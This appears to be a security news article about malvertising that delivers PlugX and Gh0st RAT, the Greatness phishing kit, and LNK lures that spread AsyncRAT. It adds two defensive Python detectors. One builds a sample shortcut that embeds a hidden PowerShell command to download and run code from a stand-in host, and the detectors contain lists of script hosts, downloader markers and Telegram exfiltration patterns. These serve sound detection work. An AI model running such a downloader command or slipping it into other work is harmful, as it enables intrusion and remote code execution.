Deceptive Google Ad Campaign Exploits Chinese Users Through Counterfeit Messaging Apps
Chinese-speaking users are being targeted by malicious Google ads that promote messaging apps restricted in China, such as Telegram, as part of an ongoing malvertising campaign. Malwarebytes researcher Jérôme Segura reports that the threat actor abuses Google advertiser accounts to create the ads, which send users to pages that deliver Remote Administration Trojans (RATs) instead of the promised app. The campaign, tracked as FakeAPP, continues an earlier wave that first targeted Hong Kong users searching for messaging apps in late October 2023. The latest iteration adds LINE to the list of impersonated messaging apps and redirects users to bogus websites hosted on Google Docs or Google Sites.
Google's own infrastructure is used to embed links to sites under the threat actor's control, which serve the malicious installer files that ultimately deploy trojans such as PlugX and Gh0st RAT. Malwarebytes traced the fraudulent ads to two advertiser accounts, Interactive Communication Team Limited and Ringier Media Nigeria Limited, both registered in Nigeria. The threat actor appears to favor quantity over quality, constantly rotating in new payloads and new command-and-control infrastructure.
In a related development, Trustwave SpiderLabs highlighted a surge in the use of a phishing-as-a-service (PhaaS) platform called Greatness, sold for $120 per month. Greatness lets its customers build convincing credential harvesting pages that mimic the Microsoft 365 login. Operators can personalize the sender name, sender email address, subject, message body, attachment, and QR code, making each lure more relevant to its target. Selling the kit to other criminal actors lowers the skill needed to run such campaigns and enables attacks at scale.
The attack chain starts with an email carrying a malicious HTML attachment. Opening it takes the recipient to a fake login page that captures the entered credentials and forwards them to the threat actor over Telegram. Some variants also drop malware on the victim's machine to steal further information. The phishing emails typically spoof trusted senders such as banks and employers and manufacture urgency with subjects like "urgent invoice payments" or "urgent account verification required."
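The attachment-based chain described above can be triaged before anyone opens the file. The following is an added example, not code from the article, from Trustwave, or from the Greatness kit: it parses an HTML attachment with the Python standard library and flags the traits the article names (a form that captures a password and posts it off the sender's domain, a redirect that bounces the recipient to a hosted page, an obfuscated page body, and a Telegram Bot API endpoint used to exfiltrate credentials). The sample attachment and its bot token are constructed here for illustration; Greatness pages will differ, and the Telegram hand-off may well happen server-side where an attachment scanner cannot see it, so only the client-side case is detectable this way.

```python
"""Triage an HTML e-mail attachment for credential-harvesting traits.

Added example, not code from the article, Trustwave or the Greatness kit.
The SAMPLE_ATTACHMENT below is constructed; the bot token in it is fake.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Telegram Bot API URLs embed the bot token: api.telegram.org/bot<id>:<secret>/<method>
TELEGRAM_BOT_API = re.compile(r"api\.telegram\.org/bot\d+:[A-Za-z0-9_-]+/", re.I)
# Script or meta-refresh redirects that bounce the victim to a hosted phishing page
REDIRECT = re.compile(
    r"location(\.href)?\s*=\s*['\"]https?://|location\.replace\(\s*['\"]https?://"
    r"|http-equiv=['\"]refresh", re.I)
# A decoder call plus a long base64 run usually means the real page body is hidden
DECODER_CALL = re.compile(r"(atob|unescape|document\.write)\s*\(", re.I)
LONG_B64 = re.compile(r"[A-Za-z0-9+/]{400,}={0,2}")


class _FormScanner(HTMLParser):
    """Collect <form> actions, their <input> types and any meta refresh."""

    def __init__(self):
        super().__init__()
        self.forms = []          # [{"action": str, "fields": [(type, name), ...]}]
        self.meta_refresh = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({"action": a.get("action", ""), "fields": []})
        elif tag == "input" and self.forms:
            self.forms[-1]["fields"].append((a.get("type", "text").lower(), a.get("name", "")))
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.meta_refresh = True


def triage_html(html: str, sender_domain: str) -> dict:
    """Return indicator names found in the attachment and the hosts credentials would go to."""
    p = _FormScanner()
    p.feed(html)
    indicators, exfil_hosts = set(), set()
    for form in p.forms:
        types = [t for t, _ in form["fields"]]
        host = (urlparse(form["action"]).hostname or "").lower()
        if "password" in types:
            indicators.add("password-form")
            # A legitimate sender posts credentials to its own domain, not somewhere else
            if host and host != sender_domain and not host.endswith("." + sender_domain):
                indicators.add("off-domain-post")
                exfil_hosts.add(host)
    if TELEGRAM_BOT_API.search(html):
        indicators.add("telegram-bot-exfil")
        exfil_hosts.add("api.telegram.org")
    if p.meta_refresh or REDIRECT.search(html):
        indicators.add("redirect")
    if DECODER_CALL.search(html) and LONG_B64.search(html):
        indicators.add("obfuscated-payload")
    return {"indicators": sorted(indicators), "exfil_hosts": sorted(exfil_hosts)}


# Constructed sample: 480 base64 characters stand in for an encoded page body
B64_FILLER = "QUFB" * 120
SAMPLE_ATTACHMENT = (
    '<html><head><meta http-equiv="refresh" content="5;url=https://login.example.invalid/"></head>\n'
    '<body><form method="POST" action="https://login.example.invalid/post.php">\n'
    '<input type="email" name="user"><input type="password" name="pass">'
    '<input type="submit" value="Sign in"></form>\n'
    '<script>\n'
    'var bot = "https://api.telegram.org/bot123456789:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/sendMessage";\n'
    'document.write(atob("' + B64_FILLER + '"));\n'
    '</script></body></html>'
)

if __name__ == "__main__":
    print(triage_html(SAMPLE_ATTACHMENT, "contoso.example"))
```

The sender domain is taken from the envelope or the authenticated From header, not from the display name, since the display name is exactly what the kit lets the operator personalize.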
Trustwave noted that Greatness is widely used and that its operators run a Telegram community offering operational guidance and additional tips. Separately, phishing attacks in South Korea have been observed using Windows shortcut (LNK) files that impersonate legitimate applications and companies such as Kakao to distribute AsyncRAT. The shortcuts pass for ordinary documents because Windows Explorer never displays the '.LNK' extension, even when the option to hide known file extensions is turned off, so a file named like a document with '.lnk' appended shows only the document-looking name.
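Because the '.lnk' suffix is invisible to the user, the check has to look inside the shortcut rather than at what Explorer shows. The block below is an added example, not code from the article or from any vendor report on the South Korean campaign: it parses the Shell Link header and StringData fields as laid out in Microsoft's public MS-SHLLINK specification, then flags the traits that make a shortcut a document-shaped lure, namely a double extension, a script-host target, command-line arguments typical of a downloader, and a minimized window. The sample shortcut is constructed inside the block, with a non-routable example URL, and is not an indicator from the campaign.

```python
"""Detect Windows shortcut (.lnk) files masquerading as documents.

Added example, not from the article or any vendor report. Parses the
Shell Link header and StringData per MS-SHLLINK. The sample built by
build_sample() is constructed here and is not a real indicator.
"""
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
# StringData structures appear in this fixed order whenever their flag is set
STRING_FIELDS = [(HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location")]
SW_SHOWMINNOACTIVE = 7  # window starts minimized, a common trick to hide a console

SCRIPT_HOSTS = ("powershell", "pwsh", "cmd.exe", "wscript", "cscript", "mshta", "rundll32", "regsvr32")
# .hwp is the Hangul Word Processor format, widely used in Korea
DOC_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".txt", ".hwp")
ARG_MARKERS = ("-enc", "-encodedcommand", "-w hidden", "iex", "downloadstring", "http://", "https://")


def parse_lnk(data: bytes) -> dict:
    """Return link flags, show command, icon index and the StringData fields of a .lnk."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags, = struct.unpack_from("<I", data, 20)
    icon_index, show_cmd = struct.unpack_from("<II", data, 56)
    off = 76
    if flags & HAS_ID_LIST:                  # IDListSize (2 bytes) followed by the IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                # LinkInfoSize counts itself
        off += struct.unpack_from("<I", data, off)[0]
    info = {"flags": flags, "show_command": show_cmd, "icon_index": icon_index}
    for flag, name in STRING_FIELDS:         # CountCharacters (2 bytes) then the characters, no terminator
        if not flags & flag:
            continue
        count, = struct.unpack_from("<H", data, off)
        off += 2
        if flags & IS_UNICODE:
            info[name] = data[off:off + 2 * count].decode("utf-16-le")
            off += 2 * count
        else:                                # ANSI strings use the system code page; cp1252 assumed here
            info[name] = data[off:off + count].decode("cp1252")
            off += count
    return info


def assess(filename: str, data: bytes) -> list:
    """Return finding tags for a shortcut that looks like a document but runs a script host."""
    info = parse_lnk(data)
    findings = []
    # Explorer never displays .lnk (NeverShowExt), so the user sees only the inner name
    shown = filename[:-4] if filename.lower().endswith(".lnk") else filename
    if shown.lower().endswith(DOC_EXTS):
        findings.append("double-extension")
    target = (info.get("relative_path", "") + " " + info.get("arguments", "")).lower()
    if any(h in target for h in SCRIPT_HOSTS):
        findings.append("script-host-target")
    if any(m in target for m in ARG_MARKERS):
        findings.append("suspicious-arguments")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("minimized-window")
    return findings


def build_sample() -> bytes:
    """Constructed shortcut: named like a PDF, launches a minimized PowerShell downloader."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    # 76-byte ShellLinkHeader: size, CLSID, flags, attributes, three FILETIMEs, size, icon, show, hotkey, reserved
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20, 0, 0, 0, 0,
                         0, SW_SHOWMINNOACTIVE, 0, 0, 0, 0)

    def s(text):  # one StringData entry: CountCharacters + UTF-16LE characters
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    return (header
            + s(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe")
            + s("-w hidden -nop -c \"iex (New-Object Net.WebClient).DownloadString('http://example.invalid/x')\"")
            + s(r"%SystemRoot%\System32\shell32.dll"))


if __name__ == "__main__":
    print(assess("Notice.pdf.lnk", build_sample()))
```

Real lures often carry a LinkTargetIDList rather than a relative path; the parser skips that structure by size but does not decode it, so a production version should also resolve the target from the IDList or from the LinkInfo local base path.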
Source: https://thehackernews.com/2024/01/malicious-ads-on-google-target-chinese.html